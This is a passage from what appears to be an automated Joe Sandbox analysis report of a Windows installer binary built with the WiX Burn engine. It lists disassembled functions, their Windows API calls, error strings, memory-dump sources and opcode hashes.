                                                                                                                                                                  • ReleaseMutex.KERNEL32(0097E860), ref: 009562E2
                                                                                                                                                                  • SetEvent.KERNEL32(00000000), ref: 009562EB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
                                                                                                                                                                  • String ID: Failed to allocate buffer.$d:\a\wix4\wix4\src\burn\engine\netfxchainer.cpp
                                                                                                                                                                  • API String ID: 944053411-1881421891
                                                                                                                                                                  • Opcode ID: 6547e78d5f3e837c0582b8182ecf1888e969ab858c65e9fa01fade458120ace6
                                                                                                                                                                  • Instruction ID: fb1c599839b5a73a884cd28b8da810bcbcb4109c6f8576a590fc80dd2cb979ee
                                                                                                                                                                  • Opcode Fuzzy Hash: 6547e78d5f3e837c0582b8182ecf1888e969ab858c65e9fa01fade458120ace6
                                                                                                                                                                  • Instruction Fuzzy Hash: 3731C071A0060ABFDB00DF58CC44A9EB7F9FF48314F118568F924A7261C371AD918BA0
                                                                                                                                                                  Function 00918306 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,00000000,?,00919840,00919840,?,00918154,?,?,00000000), ref: 00918342
                                                                                                                                                                  • GetLastError.KERNEL32(?,00918154,?,?,00000000,?,00000000,00919840,?,0091B468,?,?,?,?,?), ref: 00918371
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareErrorLastString
                                                                                                                                                                  • String ID: Failed to compare strings.$d:\a\wix4\wix4\src\burn\engine\variable.cpp$version.dll
                                                                                                                                                                  • API String ID: 1733990998-1162684775
                                                                                                                                                                  • Opcode ID: f4c5fe54bc815762509d11743a72e5c327681a49748120d440c7b0cb5c8fbefe
                                                                                                                                                                  • Instruction ID: 42c56db113a158a9c5b127b8c61a013caa94062ba058adf6bbd6a23d7f068046
                                                                                                                                                                  • Opcode Fuzzy Hash: f4c5fe54bc815762509d11743a72e5c327681a49748120d440c7b0cb5c8fbefe
                                                                                                                                                                  • Instruction Fuzzy Hash: 3621D873700119ABC7108F58CD45BAEB669AB49B60F290615F934AB3D0DA70ED42A7A0
                                                                                                                                                                  Function 0091165F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(?,?,000000FF,00000000,00000000,?,?,0093EC52,00000002,000000FF,00000000,000000FF,?,?,00000000), ref: 00911673
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MultipleObjectsWait
                                                                                                                                                                  • String ID: Abandoned wait for multiple objects, index: %u.$Failed to wait for multiple objects.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apputil.cpp
                                                                                                                                                                  • API String ID: 862713236-4067188417
                                                                                                                                                                  • Opcode ID: 118f210e7e6f9726667c6494254e9cac6ca9bed40b9b9a1bd9f91545ee828350
                                                                                                                                                                  • Instruction ID: 8281705ba42a2868c5dbb6cce909fd9a562eb9ced4717fb71d0427a1fff00bb3
                                                                                                                                                                  • Opcode Fuzzy Hash: 118f210e7e6f9726667c6494254e9cac6ca9bed40b9b9a1bd9f91545ee828350
                                                                                                                                                                  • Instruction Fuzzy Hash: 2A213573B4122973DB2059154C4AFDF695CEB44B61F064525FF06BF2C2E6758C8082E0
                                                                                                                                                                  Function 00919880 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 00919893
                                                                                                                                                                    • Part of subcall function 0096BFC9: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,00916E9A,00000001,00916DEA,?,?,?,00977562,00000000), ref: 0096BFE1
                                                                                                                                                                    • Part of subcall function 0096BFC9: GetProcAddress.KERNEL32(00000000), ref: 0096BFE8
                                                                                                                                                                    • Part of subcall function 0096BFC9: GetLastError.KERNEL32(?,?,?,00977562,00000000), ref: 0096C010
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to set system folder variant value., xrefs: 00919926
                                                                                                                                                                  • Failed to get 64-bit system folder., xrefs: 009198B8
                                                                                                                                                                  • Failed to get 32-bit system folder., xrefs: 009198D7, 009198FF
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 00919938
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressCurrentErrorHandleLastModuleProcProcess
                                                                                                                                                                  • String ID: Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 896058289-2644686703
                                                                                                                                                                  • Opcode ID: d185f572d7cdf3774612c6b52f15d0afb1fe86b8c9fff66d8107284846483d6e
                                                                                                                                                                  • Instruction ID: 660b39ead81a0ca3b0bde593812e03f784789e649c89554d0984238a52f25221
                                                                                                                                                                  • Opcode Fuzzy Hash: d185f572d7cdf3774612c6b52f15d0afb1fe86b8c9fff66d8107284846483d6e
                                                                                                                                                                  • Instruction Fuzzy Hash: 7B210831F8072CB6DB32A7558C1BFDF69B8AF84B50F1141A9B544BA2C1E6B09BC0D691
                                                                                                                                                                  Function 0092C54C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 76COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0091540B: GetProcessHeap.KERNEL32(?,00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0091541C
                                                                                                                                                                    • Part of subcall function 0091540B: RtlAllocateHeap.NTDLL(00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00915423
                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(001F01FF,00000000,00000000,?,00000044,00000001,00000000,0092D5FB,?,?,?,0092D2F1,001F01FF,0092D617,00000000,00000000), ref: 0092C5A2
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0092D2F1,001F01FF,0092D617,00000000,00000000,?,0092D5FB,0000001A,001F01FF,?,00000000,00000000,?), ref: 0092C5AC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocateCreateErrorKnownLastProcessWell
                                                                                                                                                                  • String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                  • API String ID: 2186923214-3368738088
                                                                                                                                                                  • Opcode ID: a12bdc5bdb48f3141f4c5c18df613edeb5cbd3f1e499886ae136b075e63c2ed1
                                                                                                                                                                  • Instruction ID: 68341ab5740730bc4fe477b113c04f998d544a2691cfbdd0ca9a447300eff84d
                                                                                                                                                                  • Opcode Fuzzy Hash: a12bdc5bdb48f3141f4c5c18df613edeb5cbd3f1e499886ae136b075e63c2ed1
                                                                                                                                                                  • Instruction Fuzzy Hash: DF1157B3B4533473E320665A6C4AF9F6A5CCFC5B60F120416BE08BB282E1B4DC8082F0
                                                                                                                                                                  Function 00978C8F Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 72COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00978D33
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                  • String ID: Already processed this value.$Failed to allocate value.$Failed to get value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp
                                                                                                                                                                  • API String ID: 3341692771-474062544
                                                                                                                                                                  • Opcode ID: 030e27beb14e4ba674089c534660df8ef4ff388ef43283e0e4680d1b022c1930
                                                                                                                                                                  • Instruction ID: 0a55b62a25a5fdf97c5d14c243870f04db92d972216cde5f7f18ebe72f706666
                                                                                                                                                                  • Opcode Fuzzy Hash: 030e27beb14e4ba674089c534660df8ef4ff388ef43283e0e4680d1b022c1930
                                                                                                                                                                  • Instruction Fuzzy Hash: 65113A63BC0718B7E73226448C4EFBFA96CDFD2B64F158024BB087A1C1AAB14D0052F4
                                                                                                                                                                  Function 009724D0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 69COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00916C5C,00000000,00000000,?,?,00000000,00000000), ref: 009724FE
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\shelutil.cpp, xrefs: 00972567
                                                                                                                                                                  • Failed to copy shell folder path: %ls, xrefs: 00972539
                                                                                                                                                                  • Failed to get folder path for CSIDL: %d, xrefs: 0097250D
                                                                                                                                                                  • Failed to backslash terminate shell folder path: %ls, xrefs: 00972558
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FolderPath
                                                                                                                                                                  • String ID: Failed to backslash terminate shell folder path: %ls$Failed to copy shell folder path: %ls$Failed to get folder path for CSIDL: %d$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\shelutil.cpp
                                                                                                                                                                  • API String ID: 1514166925-3657258693
                                                                                                                                                                  • Opcode ID: 86bc11a81e0ccb2a5347687e1670219806d718dd5136dea95372db3c403f39ab
                                                                                                                                                                  • Instruction ID: a2d66b381e67cacff1c7d9a0824422bd75900fe2acb050b37ac99af1e0dc5724
                                                                                                                                                                  • Opcode Fuzzy Hash: 86bc11a81e0ccb2a5347687e1670219806d718dd5136dea95372db3c403f39ab
                                                                                                                                                                  • Instruction Fuzzy Hash: CB117B72741728B7E721A7648C46FAF7BACDB85B54F114151B908BB1C1D6B0DD0446A1
                                                                                                                                                                  Function 009768FF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 58threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0091174A: WaitForSingleObject.KERNEL32(?,0093EA2A,00000000,?,0093EA2A,?,000000FF), ref: 00911756
                                                                                                                                                                  • GetExitCodeThread.KERNEL32(000000FF,00000000,000000FF,?,00916CF2), ref: 00976944
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0097694E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CodeErrorExitLastObjectSingleThreadWait
                                                                                                                                                                  • String ID: Failed to get thread return code.$Failed to wait for thread to complete.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\thrdutil.cpp
                                                                                                                                                                  • API String ID: 113644094-2957177065
                                                                                                                                                                  • Opcode ID: fc5958138ab869a1067ad1a366b01bf0a35704bfcd8268e5f84773fe31627d85
                                                                                                                                                                  • Instruction ID: 51186d38dbc3c84a9e750d3072ab1da5834698e8a23c297fa6210e8eb5e3e26c
                                                                                                                                                                  • Opcode Fuzzy Hash: fc5958138ab869a1067ad1a366b01bf0a35704bfcd8268e5f84773fe31627d85
                                                                                                                                                                  • Instruction Fuzzy Hash: 3F01C433B80724B7DB312A558C0AFAF2D589B96BA0F058115FF1CBE291E271985092D1
                                                                                                                                                                  Function 009333CE Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetEvent.KERNEL32(?,?,00000000,?,0091805E,?,?,?,?,?,?,?), ref: 009333EB
                                                                                                                                                                  • GetLastError.KERNEL32(?,0091805E,?,?,?,?,?,?,?), ref: 009333F5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorEventLast
                                                                                                                                                                  • String ID: Failed to set log finished event.$Failed to wait for elevated logging thread.$d:\a\wix4\wix4\src\burn\engine\core.cpp
                                                                                                                                                                  • API String ID: 3848097054-817072838
                                                                                                                                                                  • Opcode ID: fba28045970f8f4dc272fc9827cd360357ed58c4ca81c258fccf8955928e4497
                                                                                                                                                                  • Instruction ID: bf4611562b14b84acad533cb5533aaba0690417be4fecdc004729fb8cf5c2913
                                                                                                                                                                  • Opcode Fuzzy Hash: fba28045970f8f4dc272fc9827cd360357ed58c4ca81c258fccf8955928e4497
                                                                                                                                                                  • Instruction Fuzzy Hash: 3401F973BC063573D22266245C0FF9BE94D9B80BA0F118221FE14BA2E1A2A19C5186E0
                                                                                                                                                                  Function 0091174A Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 55synchronizationCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,0093EA2A,00000000,?,0093EA2A,?,000000FF), ref: 00911756
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ObjectSingleWait
                                                                                                                                                                  • String ID: Abandoned wait for single object.$Failed to wait for single object.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apputil.cpp
                                                                                                                                                                  • API String ID: 24740636-2056904685
                                                                                                                                                                  • Opcode ID: f88076703c3a58921500d7ff02aa6c73932d7cdfc4572435bf836b9adc27df23
                                                                                                                                                                  • Instruction ID: 86898ce47b3a21c57869bf79a54d5677b103374d00677070f9e78b34400b3875
                                                                                                                                                                  • Opcode Fuzzy Hash: f88076703c3a58921500d7ff02aa6c73932d7cdfc4572435bf836b9adc27df23
                                                                                                                                                                  • Instruction Fuzzy Hash: DD01DF27B4022C72D72011569C89FFB695DDB88BB0F118865FF08EB3C191288C8052E4
                                                                                                                                                                  Function 00916BE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00916BE8
                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(00000000,000000B0,00000000,000000B0,00000000,00000000,000000FF,000000B0,000000B0,00000000,00000010,00000000), ref: 00916DBC
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00916DCB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCriticalDeleteErrorHandleLastSection
                                                                                                                                                                  • String ID: Failed to create semaphore for queue.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 596325006-2650474371
                                                                                                                                                                  • Opcode ID: 62db2e0f0d2749251f02b8d811684b4d0c557929f881c98795e13a3052fdba67
                                                                                                                                                                  • Instruction ID: 454791f5c897c16e8927a149fa42d3637f4dd57edda2b2893470fb366ad4c335
                                                                                                                                                                  • Opcode Fuzzy Hash: 62db2e0f0d2749251f02b8d811684b4d0c557929f881c98795e13a3052fdba67
                                                                                                                                                                  • Instruction Fuzzy Hash: 8C019273F40329A7DB119794DC4AFDDB67CAB48315F050055FA01BA1E1D2759D80CBA0
                                                                                                                                                                  Function 009362F0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 48COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 00936300
                                                                                                                                                                  • CoUninitialize.OLE32(?,00939CE0,?,?), ref: 0093636B
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to pump messages in child process., xrefs: 00936347
                                                                                                                                                                  • Failed to initialize COM., xrefs: 0093630C
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\elevation.cpp, xrefs: 0093631E, 00936359
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeUninitialize
                                                                                                                                                                  • String ID: Failed to initialize COM.$Failed to pump messages in child process.$d:\a\wix4\wix4\src\burn\engine\elevation.cpp
                                                                                                                                                                  • API String ID: 3442037557-3194279326
                                                                                                                                                                  • Opcode ID: ea1aca486b1c093ee67b05cb525717bcdac3d277c3ab236d843173a1e8d689d1
                                                                                                                                                                  • Instruction ID: b6301a7fdcab8b5b1047f8a7288b86b6fc7b27aa09573ed3afb51b3456f189d8
                                                                                                                                                                  • Opcode Fuzzy Hash: ea1aca486b1c093ee67b05cb525717bcdac3d277c3ab236d843173a1e8d689d1
                                                                                                                                                                  • Instruction Fuzzy Hash: CC016DB2F847247FEB11A6558C0BF9A3EA8EB85B50F014151FA05F7280E5B0A9908BE5
                                                                                                                                                                  Function 0095E68E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,A68EAB5A,?,?,00000000,0097D0D5,000000FF,?,0095E66A,0095E74E,?,0095E63E,00000000), ref: 0095E6C3
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0095E6D5
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,0097D0D5,000000FF,?,0095E66A,0095E74E,?,0095E63E,00000000), ref: 0095E6F7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
